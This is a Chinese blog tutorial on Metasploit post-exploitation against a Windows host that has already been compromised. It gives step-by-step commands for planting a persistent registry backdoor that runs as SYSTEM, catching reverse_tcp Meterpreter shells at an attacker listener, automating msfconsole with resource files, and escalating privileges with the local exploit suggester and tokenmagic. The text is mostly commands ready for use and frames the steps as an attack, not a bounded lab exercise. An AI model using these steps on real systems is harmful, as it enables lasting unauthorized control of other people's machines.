Metapreter实现持续访问,自动化,提权--详细教程

Metapreter 实现持续访问

1.先拿到目标主机的控制权限后,将目标主机的会话转入后台,切换到 exploit/windows/local/persistence 模块,注意这个模块选择的payload,因为在后面进行监听的时候需要和这个payload相同

2.通过options查看需要填写的参数

EXE_NAME 生成后门文件的文件名称(非必要,用默认)

PATH 后门文件的存放路径 (非必要,用默认)

REG_NAME 注册表设置的名称 (非必要,用默认)

SESSION 作用于那个会话

STARTUP 由那个用户来运行这个脚本(一般都写SYSTEM,注:这里必须大写)

VBS_NAME VBS脚本的名称 (非必要,用默认)

set SESSION 8
setg lhost 173.30.1.3

3.执行
exploit


  1. 打开kali监听模块 exploit/multi/handler
    use exploit/multi/handler
    set payload windows/meterpreter/reverse_tcp
    set lhost 172.30.1.3
    set lport 7723
    exploit -j -z

-j 加入任务
-z 后台运行

Metapreter自动化

msfconsole -q -r <文件名> 启动时读取文件命令执行实现自动化

cat msfstart.txt

msfconsole -q -r msfstart.txt

这里会自动执行文件中的命令

Metapreter提权

local exploit suggester 模块(本地漏洞利用),用来做提权
search suggester

use 0
options

set session 1
exploit

可以尝试前面绿色的

use exploit exploit/windows/local/tokenmagic
options


set session 1
set LHOST 172.30.1.3
exploit
getuid

提权成功

相关推荐
LSL666_3 小时前
5 Repository 层接口
android·运维·elasticsearch·jenkins·repository
电棍2335 小时前
在docker a100云服务器运行vulkan->sapien->robotwin的经验(报错segmentation fault)
运维·docker·容器
云动雨颤7 小时前
访问宝塔面板安全入口404?SSH命令轻松解决
linux·运维·安全
NPE~7 小时前
[Linux命令分享]日志查看 — — less
linux·运维·less·常用命令·日志查看
逻极8 小时前
Claude Code 实战:Spec-Kit、Kiro、OpenSpec 规范驱动开发三剑客
ide·人工智能·驱动开发·ai·自动化
大锦终9 小时前
【Linux】网络层与数据链路层中重点介绍
linux·运维·服务器·网络
lht6319356129 小时前
从Windows通过XRDP远程访问和控制银河麒麟 v10服务器
linux·运维·服务器·windows
3DVisionary10 小时前
从手动到智能:XTOM-STATION自动化检测中心在复杂曲面零件全尺寸检测中的应用
运维·自动化·自动驾驶·工业自动化·质量控制·自动化3d测量·复杂零件检测
阿豪学编程10 小时前
环境变量与程序地址空间
linux·运维·windows
佐杰11 小时前
什么是DevOps
运维·devops